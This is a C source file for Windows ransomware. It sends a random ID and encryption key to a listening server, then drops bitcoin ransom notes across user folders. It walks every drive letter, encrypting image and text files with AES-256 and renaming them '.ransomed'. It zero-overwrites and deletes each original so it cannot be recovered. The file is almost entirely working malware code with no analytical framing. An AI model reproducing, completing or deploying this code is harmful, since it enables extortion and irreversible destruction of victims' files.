#include <errno.h>
#include <ftw.h>
#include <openssl/evp.h>
#include <openssl/hmac.h>
#include <openssl/kdf.h>
#include <openssl/rand.h>
#include <openssl/sha.h>
#include <share.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>
#include <winsock2.h>
#include <ws2tcpip.h>
#include <shlobj.h>


#define PORT "3490"

#define HOST "localhost"

#define MAXDATASIZE 100

#define EXTENSIONS ".png.jpg.gif.txt.null"
#define ENCRYPT_EXTENSION ".ransomed"

const EVP_CIPHER *cipher = NULL;
unsigned char key[EVP_MAX_KEY_LENGTH] = {0};
unsigned char iv[EVP_MAX_IV_LENGTH] = {0};
unsigned char mac[SHA256_DIGEST_LENGTH] = {0};
unsigned char hmac_key[SHA256_DIGEST_LENGTH] = {0};
const EVP_MD *digest;

EVP_CIPHER_CTX *ctx;

unsigned char salt[SHA256_DIGEST_LENGTH];

unsigned char random_id[SHA256_DIGEST_LENGTH];
unsigned char random_key[SHA256_DIGEST_LENGTH];

/* Writes ransom note to various directories to ensure it is found */
void write_note(char *base64_id_string) {

  /* Array of CSIDL integers */
  int csidl_array[] = {CSIDL_PERSONAL,
                       CSIDL_MYDOCUMENTS,
                       CSIDL_MYMUSIC,
                       CSIDL_MYPICTURES,
                       CSIDL_MYVIDEO,
                       CSIDL_COMMON_DESKTOPDIRECTORY,
                       CSIDL_COMMON_DOCUMENTS,
                       CSIDL_COMMON_MUSIC,
                       CSIDL_COMMON_PICTURES,
                       CSIDL_COMMON_VIDEO};

  /* Loop through CSIDL values to get paths for each to write note to */
  for (int i = 0; i < sizeof(csidl_array) / sizeof(int); i++) {

    TCHAR path[MAX_PATH];
    HRESULT hr =
        SHGetFolderPath(NULL, csidl_array[i], NULL, SHGFP_TYPE_CURRENT, path);

    strcat(path, "\\RANSOM_NOTE.txt");

    FILE *note = fopen(path, "w");
    if (note != NULL) {
      fprintf(
          note,
          "Your files have been encrypted. A unique ID token has been assigned to\
you and is shown below. Send this ID token along with $x in BitCoin\
to xxx@xxx to retrieve the decryption program and your key.\n\n\
ID token: %s\n",
          base64_id_string);
      fclose(note);
    }
  }
}

/* Sends random key and correlating ID to server encoded in base64 */
/* Returns base64 ID string to caller */
unsigned char *send_credentials(unsigned char *id, unsigned char *key) {
  int sockfd;
  struct addrinfo hints, *servinfo, *p;
  int rv;
  char s[INET6_ADDRSTRLEN];

  memset(&hints, 0, sizeof hints);
  hints.ai_family = AF_UNSPEC;
  hints.ai_socktype = SOCK_STREAM;

  if ((rv = getaddrinfo(HOST, PORT, &hints, &servinfo)) != 0) {
    return NULL;
  }

  for (p = servinfo; p != NULL; p = p->ai_next) {
    if ((sockfd = socket(p->ai_family, p->ai_socktype, p->ai_protocol)) == -1) {
      continue;
    }

    if (connect(sockfd, p->ai_addr, p->ai_addrlen) == -1) {
      closesocket(sockfd);
      continue;
    }

    break;
  }

  if (p == NULL) {
    return NULL;
  }

  freeaddrinfo(servinfo);

  static unsigned char base64_id[45];
  unsigned char base64_key[45];

  EVP_EncodeBlock(base64_id, id, SHA256_DIGEST_LENGTH);
  EVP_EncodeBlock(base64_key, key, SHA256_DIGEST_LENGTH);

  unsigned char credential_string[90];

  sprintf((char *restrict)credential_string, "%s %s", base64_id, base64_key);

  send(sockfd, credential_string, strlen((const char *)credential_string), 0);

  closesocket(sockfd);

  return base64_id;
}

/* Encrypts and overwrites file receieved by ftw */
/* Do not print any error messages so process is silent */
int file_crypt(const char *file_name) {
  struct stat st;
  stat(file_name, &st);

  if (st.st_size < 1) {
    return 1;
  }

  if (access(file_name, R_OK | W_OK) != 0) {
    return 1;
  }

  size_t file_size = st.st_size;
  unsigned int buffer_size = 1024;
  int outlen = 0, inlen = 0;
  size_t written = 0;

  unsigned char in_buffer[buffer_size + EVP_MAX_BLOCK_LENGTH];
  unsigned char out_buffer[buffer_size + EVP_MAX_BLOCK_LENGTH];

  if (!RAND_bytes(salt, sizeof(salt))) {
    return 1;
  }

  cipher = EVP_get_cipherbyname("aes-256-ctr");
  digest = EVP_get_digestbyname("sha512");

  if (!PKCS5_PBKDF2_HMAC((char *)random_key, SHA256_DIGEST_LENGTH, salt,
                         sizeof(salt), 1000, digest,
                         EVP_CIPHER_key_length(cipher), key)) {
    OPENSSL_cleanse(key, sizeof(key));
    return 1;
  }

  if (EVP_CIPHER_iv_length(cipher) != 0) {
    if (!PKCS5_PBKDF2_HMAC((char *)random_key, SHA256_DIGEST_LENGTH, salt,
                           sizeof(salt), 1, digest,
                           EVP_CIPHER_iv_length(cipher), iv)) {
      OPENSSL_cleanse(key, sizeof(key));
      return 1;
    }
  }

  /* Derive separate authentication key */
  EVP_PKEY_CTX *pctx;

  size_t pkey_outlen = sizeof(hmac_key);
  pctx = EVP_PKEY_CTX_new_id(EVP_PKEY_HKDF, NULL);

  if (EVP_PKEY_derive_init(pctx) <= 0) {
    OPENSSL_cleanse(key, sizeof(key));
    EVP_PKEY_CTX_free(pctx);
    return 1;
  }
  if (EVP_PKEY_CTX_set_hkdf_md(pctx, EVP_sha256()) <= 0) {
    OPENSSL_cleanse(key, sizeof(key));
    EVP_PKEY_CTX_free(pctx);
    return 1;
  }
  if (EVP_PKEY_CTX_set1_hkdf_key(pctx, key, sizeof(key)) <= 0) {
    OPENSSL_cleanse(key, sizeof(key));
    EVP_PKEY_CTX_free(pctx);
    return 1;
  }
  if (EVP_PKEY_CTX_add1_hkdf_info(pctx, "authkey", strlen("authkey")) <= 0) {
    OPENSSL_cleanse(key, sizeof(key));
    EVP_PKEY_CTX_free(pctx);
    return 1;
  }
  if (EVP_PKEY_derive(pctx, hmac_key, &pkey_outlen) <= 0) {
    OPENSSL_cleanse(key, sizeof(key));
    EVP_PKEY_CTX_free(pctx);
    return 1;
  }

  EVP_PKEY_CTX_free(pctx);

  HMAC_CTX *hmac_ctx = HMAC_CTX_new();
  HMAC_Init_ex(hmac_ctx, hmac_key, sizeof(hmac_key), EVP_sha256(), NULL);

  /* Include IV in authenticated data */
  HMAC_Update(hmac_ctx, iv, EVP_CIPHER_iv_length(cipher));

  ctx = EVP_CIPHER_CTX_new();
  EVP_CIPHER_CTX_init(ctx);

  EVP_CipherInit_ex(ctx, cipher, NULL, key, iv, 1);

  /* Append ENCRYPT_EXTENSION to new_file_name */
  char new_file_name[strlen(file_name) + strlen(ENCRYPT_EXTENSION) + 1];
  strcpy(new_file_name, file_name);
  strcat(new_file_name, ENCRYPT_EXTENSION);

  FILE *new_file = _fsopen(new_file_name, "wb", _SH_DENYNO);
  if (new_file == NULL) {
    return 1;
  }

  FILE *file = fopen(file_name, "rb");
  if (file == NULL) {
    return 1;
  }

  size_t remaining = file_size;
  while (remaining) {

    if (buffer_size > remaining)
      buffer_size = remaining;

    inlen = fread(in_buffer, sizeof(char), buffer_size, file);

    if (!EVP_CipherUpdate(ctx, out_buffer, &outlen, in_buffer, inlen)) {
      OPENSSL_cleanse(key, sizeof(key));
      HMAC_CTX_free(hmac_ctx);
      EVP_CIPHER_CTX_cleanup(ctx);
      fclose(file);
      fclose(new_file);
      return 1;
    }

    /* Authenticate cipher-text, a la Encrypt-then-MAC */
    HMAC_Update(hmac_ctx, out_buffer, outlen);

    if (fwrite(out_buffer, sizeof(char), outlen, new_file) != outlen) {
      OPENSSL_cleanse(key, sizeof(key));
      HMAC_CTX_free(hmac_ctx);
      EVP_CIPHER_CTX_cleanup(ctx);
      fclose(file);
      fclose(new_file);
      return 1;
    }

    written += outlen;
    remaining -= buffer_size;
  }

  /* Encrypt and authenticate last block of cipher-text if using CBC */
  outlen = 0;

  if (!EVP_CipherFinal_ex(ctx, out_buffer, &outlen)) {
    OPENSSL_cleanse(key, sizeof(key));
    HMAC_CTX_free(hmac_ctx);
    EVP_CIPHER_CTX_cleanup(ctx);
    fclose(file);
    fclose(new_file);
    return 1;
  }

  if (outlen > 0)
    written += outlen;

  HMAC_Update(hmac_ctx, out_buffer, outlen);

  if (fwrite(out_buffer, sizeof(char), outlen, new_file) != outlen) {
    OPENSSL_cleanse(key, sizeof(key));
    HMAC_CTX_free(hmac_ctx);
    EVP_CIPHER_CTX_cleanup(ctx);
    fclose(file);
    fclose(new_file);
    return 1;
  }

  unsigned int hmac_len = written + EVP_CIPHER_iv_length(cipher);

  HMAC_Final(hmac_ctx, mac, &hmac_len);
  HMAC_CTX_free(hmac_ctx);

  /* Write salt and MAC as footer */
  if (fwrite(salt, sizeof(unsigned char), sizeof(salt), new_file) !=
      sizeof(salt)) {
    OPENSSL_cleanse(key, sizeof(key));
    EVP_CIPHER_CTX_cleanup(ctx);
    fclose(file);
    fclose(new_file);
    return 1;
  }

  if (fwrite(mac, sizeof(unsigned char), sizeof(mac), new_file) !=
      sizeof(mac)) {
    OPENSSL_cleanse(key, sizeof(key));
    EVP_CIPHER_CTX_cleanup(ctx);
    fclose(file);
    fclose(new_file);
    return 1;
  }

  EVP_CIPHER_CTX_cleanup(ctx);

  fclose(file);
  fclose(new_file);

  chmod(new_file_name,
        S_IRUSR | S_IWUSR | S_IRGRP | S_IWGRP | S_IROTH | S_IWOTH);
  chmod(file_name, S_IRUSR | S_IWUSR | S_IRGRP | S_IWGRP | S_IROTH | S_IWOTH);

  FILE *old_file = _fsopen(file_name, "wb", _SH_DENYNO);
  if (old_file == NULL) {
    OPENSSL_cleanse(key, sizeof(key));
    return 1;
  }

  char zero_buffer[buffer_size];
  memset(zero_buffer, 0, buffer_size);

  /* Overwrite a megabyte (or all) of the file before removing to
   * disallow file recovery. */
  if (file_size < (1024 * 1024)) {
    remaining = file_size;
  } else {
    remaining = 1024 * 1024;
  }
  while (remaining) {

    if (buffer_size > remaining)
      buffer_size = remaining;

    fwrite(zero_buffer, sizeof(char), buffer_size, old_file);

    remaining -= buffer_size;
  }

  fclose(old_file);

  remove(file_name);

  /* Make sure the random key is not left in memory */
  OPENSSL_cleanse(key, sizeof(key));

  return 0;
}

static int traverse_dir(const char *fpath, const struct stat *sb, int tflag) {

  if (tflag == FTW_F) {
    /* Pull extension off end of file path and store in file_extension */
    char file_extension[PATH_MAX];
    for (int i = strlen(fpath);; i--) {
      if (fpath[i] == '.') {
        strcpy(file_extension, fpath + i);
        break;
      } else if (fpath[i] == '/') {
        strcpy(file_extension, ".null");
        break;
      }
    }

    /* See if extension is in EXTENSIONS */
    if (strstr(EXTENSIONS, file_extension) != NULL &&
        strstr(fpath, "RANSOM_NOTE.txt") == NULL) {
      file_crypt(fpath);
    }
  }

  return 0;
}

int main(int argc, char *argv[]) {
  OpenSSL_add_all_algorithms();

  if (!RAND_bytes(random_id, sizeof(random_id))) {
    return 1;
  }

  if (!RAND_bytes(random_key, sizeof(random_key))) {
    return 1;
  }

  WSADATA wsaData; // if this doesn't work
  // WSAData wsaData; // then try this instead

  // MAKEWORD(1,1) for Winsock 1.1, MAKEWORD(2,0) for Winsock 2.0:

  if (WSAStartup(MAKEWORD(1, 1), &wsaData) != 0) {
    fprintf(stderr, "WSAStartup failed.\n");
    exit(1);
  }

  unsigned char *base64_id_string;

  /* Send credentials to the server. If server cannot be reached,
   * sleep for 1 second before trying again */
  while (1) {
    base64_id_string = send_credentials(random_id, random_key);
    if (base64_id_string != NULL)
      break;
    sleep(1);
  }

  write_note(base64_id_string);

  /* Make array of drive letters to cycle through */
  char alphabet[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
  char drive_letter[5];

  /* Loop through drive letters and run ftw on all of them */
  for (int i = 0; i < strlen(alphabet); i++) {
    memset(drive_letter, '\0', sizeof(drive_letter));
    drive_letter[0] = alphabet[i];
    strcat(drive_letter, ":\\");
    ftw(drive_letter, traverse_dir, 1);
  }

  /* Make sure the static_key that key was derived from is not left
   * in memory */
  OPENSSL_cleanse(random_key, sizeof(random_key));

  exit(EXIT_SUCCESS);
}
